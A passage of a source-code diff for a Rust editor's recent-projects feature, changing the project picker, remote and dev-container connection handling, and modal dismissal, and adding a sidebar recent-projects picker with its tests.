window.prevent_default(); + 
this.delegate.set_selected_index(ix, window, cx); + this.delegate.confirm(true, window, cx); + })), + ) .child( IconButton::new("delete", IconName::Close) .icon_size(IconSize::Small) @@ -1229,13 +1567,8 @@ impl PickerDelegate for RecentProjectsDelegate { }) .tooltip(Tooltip::text(tooltip_path)), ) - .map(|el| { - if self.selected_index == ix { - el.end_slot(secondary_actions) - } else { - el.end_hover_slot(secondary_actions) - } - }) + .end_slot(secondary_actions) + .show_end_slot_on_hover() .into_any_element(), ) } @@ -1245,9 +1578,9 @@ impl PickerDelegate for RecentProjectsDelegate { fn render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { let focus_handle = self.focus_handle.clone(); let popover_style = matches!(self.style, ProjectPickerStyle::Popover); - let open_folder_section = matches!( - self.filtered_entries.get(self.selected_index)?, - ProjectPickerEntry::OpenFolder { .. } + let is_already_open_entry = matches!( + self.filtered_entries.get(self.selected_index), + Some(ProjectPickerEntry::OpenFolder { .. 
} | ProjectPickerEntry::OpenProject(_)) ); if popover_style { @@ -1258,17 +1591,14 @@ impl PickerDelegate for RecentProjectsDelegate { .gap_1() .border_t_1() .border_color(cx.theme().colors().border_variant) - .child( + .child({ + let open_action = workspace::Open::default(); Button::new("open_local_folder", "Open Local Project") - .key_binding(KeyBinding::for_action_in( - &workspace::Open, - &focus_handle, - cx, - )) - .on_click(|_, window, cx| { - window.dispatch_action(workspace::Open.boxed_clone(), cx) - }), - ) + .key_binding(KeyBinding::for_action_in(&open_action, &focus_handle, cx)) + .on_click(move |_, window, cx| { + window.dispatch_action(open_action.boxed_clone(), cx) + }) + }) .child( Button::new("open_remote_folder", "Open Remote Project") .key_binding(KeyBinding::for_action( @@ -1293,6 +1623,44 @@ impl PickerDelegate for RecentProjectsDelegate { ); } + let selected_entry = self.filtered_entries.get(self.selected_index); + + let secondary_footer_actions: Option = match selected_entry { + Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::OpenProject(_)) => { + let label = if matches!(selected_entry, Some(ProjectPickerEntry::OpenFolder { .. 
})) + { + "Remove Folder" + } else { + "Remove from Window" + }; + Some( + Button::new("remove_selected", label) + .key_binding(KeyBinding::for_action_in( + &RemoveSelected, + &focus_handle, + cx, + )) + .on_click(|_, window, cx| { + window.dispatch_action(RemoveSelected.boxed_clone(), cx) + }) + .into_any_element(), + ) + } + Some(ProjectPickerEntry::RecentProject(_)) => Some( + Button::new("delete_recent", "Delete") + .key_binding(KeyBinding::for_action_in( + &RemoveSelected, + &focus_handle, + cx, + )) + .on_click(|_, window, cx| { + window.dispatch_action(RemoveSelected.boxed_clone(), cx) + }) + .into_any_element(), + ), + _ => None, + }; + Some( h_flex() .flex_1() @@ -1301,8 +1669,11 @@ impl PickerDelegate for RecentProjectsDelegate { .justify_end() .border_t_1() .border_color(cx.theme().colors().border_variant) + .when_some(secondary_footer_actions, |this, actions| { + this.child(actions) + }) .map(|this| { - if open_folder_section { + if is_already_open_entry { this.child( Button::new("activate", "Activate") .key_binding(KeyBinding::for_action_in( @@ -1349,7 +1720,7 @@ impl PickerDelegate for RecentProjectsDelegate { y: px(-2.0), }) .trigger( - Button::new("actions-trigger", "Actions…") + Button::new("actions-trigger", "Actions") .selected_style(ButtonStyle::Tinted(TintColor::Accent)) .key_binding(KeyBinding::for_action_in( &ToggleActionsMenu, @@ -1359,15 +1730,32 @@ impl PickerDelegate for RecentProjectsDelegate { ) .menu({ let focus_handle = focus_handle.clone(); + let show_add_to_workspace = match selected_entry { + Some(ProjectPickerEntry::RecentProject(hit)) => self + .workspaces + .get(hit.candidate_id) + .map(|(_, loc, ..)| { + matches!(loc, SerializedWorkspaceLocation::Local) + }) + .unwrap_or(false), + _ => false, + }; move |window, cx| { Some(ContextMenu::build(window, cx, { let focus_handle = focus_handle.clone(); move |menu, _, _| { menu.context(focus_handle) + .when(show_add_to_workspace, |menu| { + menu.action( + "Add to Workspace", + 
AddToWorkspace.boxed_clone(), + ) + .separator() + }) .action( "Open Local Project", - workspace::Open.boxed_clone(), + workspace::Open::default().boxed_clone(), ) .action( "Open Remote Project", @@ -1387,7 +1775,7 @@ impl PickerDelegate for RecentProjectsDelegate { } } -fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> IconName { +pub(crate) fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> IconName { match options { None => IconName::Screen, Some(options) => match options { @@ -1401,7 +1789,7 @@ fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> Icon } // Compute the highlighted text for the name and path -fn highlights_for_path( +pub(crate) fn highlights_for_path( path: &Path, match_positions: &Vec, path_start_offset: usize, @@ -1500,16 +1888,16 @@ impl RecentProjectsDelegate { .workspace .upgrade() .map(|ws| ws.read(cx).app_state().fs.clone()); + let db = WorkspaceDb::global(cx); cx.spawn_in(window, async move |this, cx| { - WORKSPACE_DB - .delete_workspace_by_id(workspace_id) - .await - .log_err(); + db.delete_workspace_by_id(workspace_id).await.log_err(); let Some(fs) = fs else { return }; - let workspaces = WORKSPACE_DB + let workspaces = db .recent_workspaces_on_disk(fs.as_ref()) .await .unwrap_or_default(); + let workspaces = + workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |picker, window, cx| { picker.delegate.set_workspaces(workspaces); picker @@ -1530,6 +1918,31 @@ impl RecentProjectsDelegate { } } + fn remove_sibling_workspace( + &mut self, + workspace_id: WorkspaceId, + window: &mut Window, + cx: &mut Context>, + ) { + if let Some(handle) = window.window_handle().downcast::() { + cx.defer(move |cx| { + handle + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace + .workspaces() + .find(|ws| ws.read(cx).database_id() == Some(workspace_id)) + .cloned(); + if let Some(workspace) = workspace { + 
multi_workspace.remove(&workspace, window, cx); + } + }) + .log_err(); + }); + } + + self.sibling_workspace_ids.remove(&workspace_id); + } + fn is_current_workspace( &self, workspace_id: WorkspaceId, @@ -1545,6 +1958,15 @@ impl RecentProjectsDelegate { false } + fn is_sibling_workspace( + &self, + workspace_id: WorkspaceId, + cx: &mut Context>, + ) -> bool { + self.sibling_workspace_ids.contains(&workspace_id) + && !self.is_current_workspace(workspace_id, cx) + } + fn is_open_folder(&self, paths: &PathList) -> bool { if self.open_folders.is_empty() { return false; @@ -1567,7 +1989,9 @@ impl RecentProjectsDelegate { paths: &PathList, cx: &mut Context>, ) -> bool { - !self.is_current_workspace(workspace_id, cx) && !self.is_open_folder(paths) + !self.is_current_workspace(workspace_id, cx) + && !self.is_sibling_workspace(workspace_id, cx) + && !self.is_open_folder(paths) } } @@ -1576,7 +2000,7 @@ mod tests { use std::path::PathBuf; use editor::Editor; - use gpui::{TestAppContext, UpdateGlobal, WindowHandle}; + use gpui::{TestAppContext, UpdateGlobal, VisualTestContext, WindowHandle}; use serde_json::json; use settings::SettingsStore; @@ -1586,7 +2010,7 @@ mod tests { use super::*; #[gpui::test] - async fn test_dirty_workspace_survives_when_opening_recent_project(cx: &mut TestAppContext) { + async fn test_dirty_workspace_replaced_when_opening_recent_project(cx: &mut TestAppContext) { let app_state = init_test(cx); cx.update(|cx| { @@ -1628,6 +2052,11 @@ mod tests { assert_eq!(cx.update(|cx| cx.windows().len()), 1); let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + multi_workspace + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); multi_workspace .update(cx, |multi_workspace, _, cx| { assert!(!multi_workspace.workspace().read(cx).is_edited()) @@ -1695,6 +2124,13 @@ mod tests { cx.dispatch_action(*multi_workspace, menu::Confirm); cx.run_until_parked(); + // In multi-workspace mode, the dirty 
workspace is kept and a new one is + // opened alongside it — no save prompt needed. + assert!( + !cx.has_pending_prompt(), + "Should not prompt in multi-workspace mode — dirty workspace is kept" + ); + multi_workspace .update(cx, |multi_workspace, _, cx| { assert!( @@ -1707,26 +2143,16 @@ mod tests { ); assert!( - multi_workspace.workspaces().len() >= 2, - "Should have at least 2 workspaces: the dirty one and the newly opened one" - ); - - assert!( - multi_workspace.workspaces().contains(&dirty_workspace), - "The original dirty workspace should still be present" + multi_workspace.workspaces().any(|w| w == &dirty_workspace), + "The dirty workspace should still be present in multi-workspace mode" ); assert!( - dirty_workspace.read(cx).is_edited(), - "The original workspace should still be dirty" + !multi_workspace.workspace().read(cx).is_edited(), + "The active workspace should be the freshly opened one, not dirty" ); }) .unwrap(); - - assert!( - !cx.has_pending_prompt(), - "No save prompt in multi-workspace mode — dirty workspace survives in background" - ); } fn open_recent_projects( @@ -1773,9 +2199,16 @@ mod tests { ) .await; + // Open a file path (not a directory) so that the worktree root is a + // file. This means `active_project_directory` returns `None`, which + // causes `DevContainerContext::from_workspace` to return `None`, + // preventing `open_dev_container` from spawning real I/O (docker + // commands, shell environment loading) that is incompatible with the + // test scheduler. The modal is still created and the re-entrancy + // guard that this test validates is still exercised. 
cx.update(|cx| { open_paths( - &[PathBuf::from(path!("/project"))], + &[PathBuf::from(path!("/project/src/main.rs"))], app_state, workspace::OpenOptions::default(), cx, @@ -1811,6 +2244,71 @@ mod tests { .unwrap(); } + #[gpui::test] + async fn test_dev_container_modal_not_dismissed_on_backdrop_click(cx: &mut TestAppContext) { + let app_state = init_test(cx); + + app_state + .fs + .as_fake() + .insert_tree( + path!("/project"), + json!({ + ".devcontainer": { + "devcontainer.json": "{}" + }, + "src": { + "main.rs": "fn main() {}" + } + }), + ) + .await; + + cx.update(|cx| { + open_paths( + &[PathBuf::from(path!("/project"))], + app_state, + workspace::OpenOptions::default(), + cx, + ) + }) + .await + .unwrap(); + + assert_eq!(cx.update(|cx| cx.windows().len()), 1); + let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + + cx.run_until_parked(); + + cx.dispatch_action(*multi_workspace, OpenDevContainer); + + multi_workspace + .update(cx, |multi_workspace, _, cx| { + assert!( + multi_workspace + .active_modal::(cx) + .is_some(), + "Dev container modal should be open" + ); + }) + .unwrap(); + + // Click outside the modal (on the backdrop) to try to dismiss it + let mut vcx = VisualTestContext::from_window(*multi_workspace, cx); + vcx.simulate_click(gpui::point(px(1.0), px(1.0)), gpui::Modifiers::default()); + + multi_workspace + .update(cx, |multi_workspace, _, cx| { + assert!( + multi_workspace + .active_modal::(cx) + .is_some(), + "Dev container modal should remain open during creation" + ); + }) + .unwrap(); + } + #[gpui::test] async fn test_open_dev_container_action_with_multiple_configs(cx: &mut TestAppContext) { let app_state = init_test(cx); diff --git a/crates/recent_projects/src/remote_connections.rs b/crates/recent_projects/src/remote_connections.rs index b5af1a110a5b0ebae6cb8e6e035791b564e15527..869568edfcdbe9260a13aaa5c0ed7eed6b87e675 100644 --- a/crates/recent_projects/src/remote_connections.rs +++ 
b/crates/recent_projects/src/remote_connections.rs @@ -10,7 +10,6 @@ use extension_host::ExtensionStore; use futures::{FutureExt as _, channel::oneshot, select}; use gpui::{AppContext, AsyncApp, PromptLevel, WindowHandle}; -use language::Point; use project::trusted_worktrees; use remote::{ DockerConnectionOptions, Interactive, RemoteConnection, RemoteConnectionOptions, @@ -97,6 +96,7 @@ impl From for RemoteConnectionOptions { container_id: conn.container_id, upload_binary_over_docker_exec: false, use_podman: conn.use_podman, + remote_env: conn.remote_env, }) } } @@ -133,7 +133,7 @@ pub async fn open_remote_project( open_options: workspace::OpenOptions, cx: &mut AsyncApp, ) -> Result<()> { - let created_new_window = open_options.replace_window.is_none(); + let created_new_window = open_options.requesting_window.is_none(); let (existing, open_visible) = find_existing_workspace( &paths, @@ -160,7 +160,7 @@ pub async fn open_remote_project( let open_results = existing_window .update(cx, |multi_workspace, window, cx| { window.activate_window(); - multi_workspace.activate(existing_workspace.clone(), cx); + multi_workspace.activate(existing_workspace.clone(), window, cx); existing_workspace.update(cx, |workspace, cx| { workspace.open_paths( resolved_paths, @@ -202,7 +202,7 @@ pub async fn open_remote_project( ); } - let (window, initial_workspace) = if let Some(window) = open_options.replace_window { + let (window, initial_workspace) = if let Some(window) = open_options.requesting_window { let workspace = window.update(cx, |multi_workspace, _, _| { multi_workspace.workspace().clone() })?; @@ -458,7 +458,12 @@ pub fn navigate_to_positions( active_editor.update(cx, |editor, cx| { let row = row.saturating_sub(1); let col = path.column.unwrap_or(0).saturating_sub(1); - editor.go_to_singleton_buffer_point(Point::new(row, col), window, cx); + let Some(buffer) = editor.buffer().read(cx).as_singleton() else { + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + 
let point = buffer_snapshot.point_from_external_input(row, col); + editor.go_to_singleton_buffer_point(point, window, cx); }); }) .ok(); @@ -850,7 +855,7 @@ mod tests { paths, app_state, workspace::OpenOptions { - replace_window: Some(window), + requesting_window: Some(window), ..Default::default() }, &mut async_cx, diff --git a/crates/recent_projects/src/remote_servers.rs b/crates/recent_projects/src/remote_servers.rs index 8bddcf37270e56932e75635fcd35616d12309b6e..7db09c88616879010352cbc2ac0fd0549982240b 100644 --- a/crates/recent_projects/src/remote_servers.rs +++ b/crates/recent_projects/src/remote_servers.rs @@ -11,13 +11,13 @@ use dev_container::{ }; use editor::Editor; +use extension_host::ExtensionStore; use futures::{FutureExt, channel::oneshot, future::Shared}; use gpui::{ Action, AnyElement, App, ClickEvent, ClipboardItem, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task, WeakEntity, Window, canvas, }; -use language::Point; use log::{debug, info}; use open_path_prompt::OpenPathDelegate; use paths::{global_ssh_config_file, user_ssh_config_file}; @@ -42,6 +42,7 @@ use std::{ atomic::{self, AtomicUsize}, }, }; + use ui::{ CommonAnimationExt, IconButtonShape, KeyBinding, List, ListItem, ListSeparator, Modal, ModalFooter, ModalHeader, Navigable, NavigableEntry, Section, Tooltip, WithScrollbar, @@ -53,7 +54,7 @@ use util::{ rel_path::RelPath, }; use workspace::{ - AppState, ModalView, MultiWorkspace, OpenLog, OpenOptions, Toast, Workspace, + AppState, DismissDecision, ModalView, MultiWorkspace, OpenLog, OpenOptions, Toast, Workspace, notifications::{DetachAndPromptErr, NotificationId}, open_remote_project_with_existing_connection, }; @@ -68,6 +69,7 @@ pub struct RemoteServerProjects { create_new_window: bool, dev_container_picker: Option>>, _subscription: Subscription, + allow_dismissal: bool, } struct CreateRemoteServer { @@ -390,7 +392,7 @@ impl ProjectPicker { ) -> Entity { let (tx, rx) = 
oneshot::channel(); let lister = project::DirectoryLister::Project(project.clone()); - let delegate = open_path_prompt::OpenPathDelegate::new(tx, lister, false, cx); + let delegate = open_path_prompt::OpenPathDelegate::new(tx, lister, false, cx).show_hidden(); let picker = cx.new(|cx| { let picker = Picker::uniform_list(delegate, window, cx) @@ -519,11 +521,15 @@ impl ProjectPicker { active_editor.update(cx, |editor, cx| { let row = row.saturating_sub(1); let col = path.column.unwrap_or(0).saturating_sub(1); - editor.go_to_singleton_buffer_point( - Point::new(row, col), - window, - cx, - ); + let Some(buffer) = + editor.buffer().read(cx).as_singleton() + else { + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let point = + buffer_snapshot.point_from_external_input(row, col); + editor.go_to_singleton_buffer_point(point, window, cx); }); }) .ok(); @@ -915,6 +921,7 @@ impl RemoteServerProjects { create_new_window, dev_container_picker: None, _subscription, + allow_dismissal: true, } } @@ -1135,6 +1142,7 @@ impl RemoteServerProjects { } fn view_in_progress_dev_container(&mut self, window: &mut Window, cx: &mut Context) { + self.allow_dismissal = false; self.mode = Mode::CreateRemoteDevContainer(CreateRemoteDevContainer::new( DevContainerCreationProgress::Creating, cx, @@ -1161,12 +1169,11 @@ impl RemoteServerProjects { workspace.toggle_modal(window, cx, |window, cx| { RemoteConnectionModal::new(&connection_options, Vec::new(), window, cx) }); - let prompt = workspace - .active_modal::(cx) - .unwrap() - .read(cx) - .prompt - .clone(); + // can be None if another copy of this modal opened in the meantime + let Some(modal) = workspace.active_modal::(cx) else { + return; + }; + let prompt = modal.read(cx).prompt.clone(); let connect = connect( ConnectionIdentifier::setup(), @@ -1305,6 +1312,7 @@ impl RemoteServerProjects { cx.emit(DismissEvent); } _ => { + self.allow_dismissal = true; self.mode = Mode::default_mode(&self.ssh_config_servers, cx); 
self.focus_handle(cx).focus(window, cx); cx.notify(); @@ -1564,7 +1572,7 @@ impl RemoteServerProjects { project.paths.into_iter().map(PathBuf::from).collect(), app_state, OpenOptions { - replace_window, + requesting_window: replace_window, ..OpenOptions::default() }, cx, @@ -1619,23 +1627,24 @@ impl RemoteServerProjects { })) .tooltip(Tooltip::text(project.paths.join("\n"))) .when(is_from_zed, |server_list_item| { - server_list_item.end_hover_slot::(Some( - div() - .mr_2() - .child({ - let project = project.clone(); - // Right-margin to offset it from the Scrollbar - IconButton::new("remove-remote-project", IconName::Trash) - .icon_size(IconSize::Small) - .shape(IconButtonShape::Square) - .size(ButtonSize::Large) - .tooltip(Tooltip::text("Delete Remote Project")) - .on_click(cx.listener(move |this, _, _, cx| { - this.delete_remote_project(server_ix, &project, cx) - })) - }) - .into_any_element(), - )) + server_list_item + .end_slot( + div() + .mr_2() + .child({ + let project = project.clone(); + IconButton::new("remove-remote-project", IconName::Trash) + .icon_size(IconSize::Small) + .shape(IconButtonShape::Square) + .size(ButtonSize::Large) + .tooltip(Tooltip::text("Delete Remote Project")) + .on_click(cx.listener(move |this, _, _, cx| { + this.delete_remote_project(server_ix, &project, cx) + })) + }) + .into_any_element(), + ) + .show_end_slot_on_hover() }), ) } @@ -1657,7 +1666,9 @@ impl RemoteServerProjects { fn delete_ssh_server(&mut self, server: SshServerIndex, cx: &mut Context) { self.update_settings_file(cx, move |setting, _| { - if let Some(connections) = setting.ssh_connections.as_mut() { + if let Some(connections) = setting.ssh_connections.as_mut() + && connections.get(server.0).is_some() + { connections.remove(server.0); } }); @@ -1848,11 +1859,14 @@ impl RemoteServerProjects { cx: &mut Context, ) { let replace_window = window.window_handle().downcast::(); + let app_state = Arc::downgrade(&app_state); cx.spawn_in(window, async move |entity, cx| { - let 
(connection, starting_dir) = - match start_dev_container_with_config(context, config).await { - Ok((c, s)) => (Connection::DevContainer(c), s), + let environment = context.environment(cx).await; + + let (dev_container_connection, starting_dir) = + match start_dev_container_with_config(context, config, environment).await { + Ok((c, s)) => (c, s), Err(e) => { log::error!("Failed to start dev container: {:?}", e); cx.prompt( @@ -1865,6 +1879,7 @@ impl RemoteServerProjects { .ok(); entity .update_in(cx, |remote_server_projects, window, cx| { + remote_server_projects.allow_dismissal = true; remote_server_projects.mode = Mode::CreateRemoteDevContainer(CreateRemoteDevContainer::new( DevContainerCreationProgress::Error(format!("{e}")), @@ -1876,18 +1891,32 @@ impl RemoteServerProjects { return; } }; + cx.update(|_, cx| { + ExtensionStore::global(cx).update(cx, |this, cx| { + for extension in &dev_container_connection.extension_ids { + log::info!("Installing extension {extension} from devcontainer"); + this.install_latest_extension(Arc::from(extension.clone()), cx); + } + }) + }) + .log_err(); + entity - .update(cx, |_, cx| { + .update(cx, |this, cx| { + this.allow_dismissal = true; cx.emit(DismissEvent); }) .log_err(); + let Some(app_state) = app_state.upgrade() else { + return; + }; let result = open_remote_project( - connection.into(), + Connection::DevContainer(dev_container_connection).into(), vec![starting_dir].into_iter().map(PathBuf::from).collect(), app_state, OpenOptions { - replace_window, + requesting_window: replace_window, ..OpenOptions::default() }, cx, @@ -2112,8 +2141,10 @@ impl RemoteServerProjects { .child( Button::new("learn-more", "Learn More") .label_size(LabelSize::Small) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::XSmall), + ) .on_click(|_, _, cx| { cx.open_url( "https://zed.dev/docs/remote-development", @@ -2404,9 +2435,8 @@ impl RemoteServerProjects { 
.spacing(ui::ListItemSpacing::Sparse) .start_slot(Icon::new(IconName::Copy).color(Color::Muted)) .child(Label::new("Copy Server Address")) - .end_hover_slot( - Label::new(connection_string.clone()).color(Color::Muted), - ) + .end_slot(Label::new(connection_string.clone()).color(Color::Muted)) + .show_end_slot_on_hover() .on_click({ let connection_string = connection_string.clone(); move |_, _, cx| { @@ -2924,7 +2954,15 @@ fn get_text(element: &Entity, cx: &mut App) -> String { element.read(cx).text(cx).trim().to_string() } -impl ModalView for RemoteServerProjects {} +impl ModalView for RemoteServerProjects { + fn on_before_dismiss( + &mut self, + _window: &mut Window, + _cx: &mut Context, + ) -> DismissDecision { + DismissDecision::Dismiss(self.allow_dismissal) + } +} impl Focusable for RemoteServerProjects { fn focus_handle(&self, cx: &App) -> FocusHandle { diff --git a/crates/recent_projects/src/sidebar_recent_projects.rs b/crates/recent_projects/src/sidebar_recent_projects.rs new file mode 100644 index 0000000000000000000000000000000000000000..1fe0d2ae86aefdad45136c496f8049689d77e048 --- /dev/null +++ b/crates/recent_projects/src/sidebar_recent_projects.rs @@ -0,0 +1,449 @@ +use std::collections::HashSet; +use std::sync::Arc; + +use chrono::{DateTime, Utc}; +use fuzzy::{StringMatch, StringMatchCandidate}; +use gpui::{ + Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, + Subscription, Task, WeakEntity, Window, +}; +use picker::{ + Picker, PickerDelegate, + highlighted_match_with_paths::{HighlightedMatch, HighlightedMatchWithPaths}, +}; +use remote::RemoteConnectionOptions; +use settings::Settings; +use ui::{KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*}; +use ui_input::ErasedEditor; +use util::{ResultExt, paths::PathExt}; +use workspace::{ + MultiWorkspace, OpenMode, OpenOptions, PathList, SerializedWorkspaceLocation, Workspace, + WorkspaceDb, WorkspaceId, notifications::DetachAndPromptErr, +}; + +use 
zed_actions::OpenRemote; + +use crate::{highlights_for_path, icon_for_remote_connection, open_remote_project}; + +pub struct SidebarRecentProjects { + pub picker: Entity>, + _subscription: Subscription, +} + +impl SidebarRecentProjects { + pub fn popover( + workspace: WeakEntity, + sibling_workspace_ids: HashSet, + _focus_handle: FocusHandle, + window: &mut Window, + cx: &mut App, + ) -> Entity { + let fs = workspace + .upgrade() + .map(|ws| ws.read(cx).app_state().fs.clone()); + + cx.new(|cx| { + let delegate = SidebarRecentProjectsDelegate { + workspace, + sibling_workspace_ids, + workspaces: Vec::new(), + filtered_workspaces: Vec::new(), + selected_index: 0, + has_any_non_local_projects: false, + focus_handle: cx.focus_handle(), + }; + + let picker: Entity> = cx.new(|cx| { + Picker::list(delegate, window, cx) + .list_measure_all() + .show_scrollbar(true) + }); + + let picker_focus_handle = picker.focus_handle(cx); + picker.update(cx, |picker, _| { + picker.delegate.focus_handle = picker_focus_handle; + }); + + let _subscription = + cx.subscribe(&picker, |_this: &mut Self, _, _, cx| cx.emit(DismissEvent)); + + let db = WorkspaceDb::global(cx); + cx.spawn_in(window, async move |this, cx| { + let Some(fs) = fs else { return }; + let workspaces = db + .recent_workspaces_on_disk(fs.as_ref()) + .await + .log_err() + .unwrap_or_default(); + let workspaces = + workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; + this.update_in(cx, move |this, window, cx| { + this.picker.update(cx, move |picker, cx| { + picker.delegate.set_workspaces(workspaces); + picker.update_matches(picker.query(cx), window, cx) + }) + }) + .ok(); + }) + .detach(); + + picker.focus_handle(cx).focus(window, cx); + + Self { + picker, + _subscription, + } + }) + } +} + +impl EventEmitter for SidebarRecentProjects {} + +impl Focusable for SidebarRecentProjects { + fn focus_handle(&self, cx: &App) -> FocusHandle { + self.picker.focus_handle(cx) + } +} + +impl Render for 
SidebarRecentProjects { + fn render(&mut self, _: &mut Window, _cx: &mut Context) -> impl IntoElement { + v_flex() + .key_context("SidebarRecentProjects") + .w(rems(18.)) + .child(self.picker.clone()) + } +} + +pub struct SidebarRecentProjectsDelegate { + workspace: WeakEntity, + sibling_workspace_ids: HashSet, + workspaces: Vec<( + WorkspaceId, + SerializedWorkspaceLocation, + PathList, + DateTime, + )>, + filtered_workspaces: Vec, + selected_index: usize, + has_any_non_local_projects: bool, + focus_handle: FocusHandle, +} + +impl SidebarRecentProjectsDelegate { + pub fn set_workspaces( + &mut self, + workspaces: Vec<( + WorkspaceId, + SerializedWorkspaceLocation, + PathList, + DateTime, + )>, + ) { + self.has_any_non_local_projects = workspaces + .iter() + .any(|(_, location, _, _)| !matches!(location, SerializedWorkspaceLocation::Local)); + self.workspaces = workspaces; + } +} + +impl EventEmitter for SidebarRecentProjectsDelegate {} + +impl PickerDelegate for SidebarRecentProjectsDelegate { + type ListItem = AnyElement; + + fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc { + "Search recent projects…".into() + } + + fn render_editor( + &self, + editor: &Arc, + window: &mut Window, + cx: &mut Context>, + ) -> Div { + h_flex() + .flex_none() + .h_9() + .px_2p5() + .justify_between() + .border_b_1() + .border_color(cx.theme().colors().border_variant) + .child(editor.render(window, cx)) + } + + fn match_count(&self) -> usize { + self.filtered_workspaces.len() + } + + fn selected_index(&self) -> usize { + self.selected_index + } + + fn set_selected_index( + &mut self, + ix: usize, + _window: &mut Window, + _cx: &mut Context>, + ) { + self.selected_index = ix; + } + + fn update_matches( + &mut self, + query: String, + _: &mut Window, + cx: &mut Context>, + ) -> Task<()> { + let query = query.trim_start(); + let smart_case = query.chars().any(|c| c.is_uppercase()); + let is_empty_query = query.is_empty(); + + let current_workspace_id = self + 
.workspace + .upgrade() + .and_then(|ws| ws.read(cx).database_id()); + + let candidates: Vec<_> = self + .workspaces + .iter() + .enumerate() + .filter(|(_, (id, _, _, _))| { + Some(*id) != current_workspace_id && !self.sibling_workspace_ids.contains(id) + }) + .map(|(id, (_, _, paths, _))| { + let combined_string = paths + .ordered_paths() + .map(|path| path.compact().to_string_lossy().into_owned()) + .collect::>() + .join(""); + StringMatchCandidate::new(id, &combined_string) + }) + .collect(); + + if is_empty_query { + self.filtered_workspaces = candidates + .into_iter() + .map(|candidate| StringMatch { + candidate_id: candidate.id, + score: 0.0, + positions: Vec::new(), + string: candidate.string, + }) + .collect(); + } else { + let mut matches = smol::block_on(fuzzy::match_strings( + &candidates, + query, + smart_case, + true, + 100, + &Default::default(), + cx.background_executor().clone(), + )); + matches.sort_unstable_by(|a, b| { + b.score + .partial_cmp(&a.score) + .unwrap_or(std::cmp::Ordering::Equal) + .then_with(|| a.candidate_id.cmp(&b.candidate_id)) + }); + self.filtered_workspaces = matches; + } + + self.selected_index = 0; + Task::ready(()) + } + + fn confirm(&mut self, _secondary: bool, window: &mut Window, cx: &mut Context>) { + let Some(hit) = self.filtered_workspaces.get(self.selected_index) else { + return; + }; + let Some((_, location, candidate_workspace_paths, _)) = + self.workspaces.get(hit.candidate_id) + else { + return; + }; + + let Some(workspace) = self.workspace.upgrade() else { + return; + }; + + match location { + SerializedWorkspaceLocation::Local => { + if let Some(handle) = window.window_handle().downcast::() { + let paths = candidate_workspace_paths.paths().to_vec(); + cx.defer(move |cx| { + if let Some(task) = handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.open_project(paths, OpenMode::Activate, window, cx) + }) + .log_err() + { + task.detach_and_log_err(cx); + } + }); + } + } + 
SerializedWorkspaceLocation::Remote(connection) => { + let mut connection = connection.clone(); + workspace.update(cx, |workspace, cx| { + let app_state = workspace.app_state().clone(); + let replace_window = window.window_handle().downcast::(); + let open_options = OpenOptions { + requesting_window: replace_window, + ..Default::default() + }; + if let RemoteConnectionOptions::Ssh(connection) = &mut connection { + crate::RemoteSettings::get_global(cx) + .fill_connection_options_from_settings(connection); + }; + let paths = candidate_workspace_paths.paths().to_vec(); + cx.spawn_in(window, async move |_, cx| { + open_remote_project(connection.clone(), paths, app_state, open_options, cx) + .await + }) + .detach_and_prompt_err( + "Failed to open project", + window, + cx, + |_, _, _| None, + ); + }); + } + } + cx.emit(DismissEvent); + } + + fn dismissed(&mut self, _window: &mut Window, _cx: &mut Context>) {} + + fn no_matches_text(&self, _window: &mut Window, _cx: &mut App) -> Option { + let text = if self.workspaces.is_empty() { + "Recently opened projects will show up here" + } else { + "No matches" + }; + Some(text.into()) + } + + fn render_match( + &self, + ix: usize, + selected: bool, + window: &mut Window, + cx: &mut Context>, + ) -> Option { + let hit = self.filtered_workspaces.get(ix)?; + let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + + let ordered_paths: Vec<_> = paths + .ordered_paths() + .map(|p| p.compact().to_string_lossy().to_string()) + .collect(); + + let tooltip_path: SharedString = match &location { + SerializedWorkspaceLocation::Remote(options) => { + let host = options.display_name(); + if ordered_paths.len() == 1 { + format!("{} ({})", ordered_paths[0], host).into() + } else { + format!("{}\n({})", ordered_paths.join("\n"), host).into() + } + } + _ => ordered_paths.join("\n").into(), + }; + + let mut path_start_offset = 0; + let match_labels: Vec<_> = paths + .ordered_paths() + .map(|p| p.compact()) + .map(|path| { + let 
(label, path_match) = + highlights_for_path(path.as_ref(), &hit.positions, path_start_offset); + path_start_offset += path_match.text.len(); + label + }) + .collect(); + + let prefix = match &location { + SerializedWorkspaceLocation::Remote(options) => { + Some(SharedString::from(options.display_name())) + } + _ => None, + }; + + let highlighted_match = HighlightedMatchWithPaths { + prefix, + match_label: HighlightedMatch::join(match_labels.into_iter().flatten(), ", "), + paths: Vec::new(), + }; + + let icon = icon_for_remote_connection(match location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(options) => Some(options), + }); + + Some( + ListItem::new(ix) + .toggle_state(selected) + .inset(true) + .spacing(ListItemSpacing::Sparse) + .child( + h_flex() + .gap_3() + .flex_grow() + .when(self.has_any_non_local_projects, |this| { + this.child(Icon::new(icon).color(Color::Muted)) + }) + .child(highlighted_match.render(window, cx)), + ) + .tooltip(Tooltip::text(tooltip_path)) + .into_any_element(), + ) + } + + fn render_footer(&self, _: &mut Window, cx: &mut 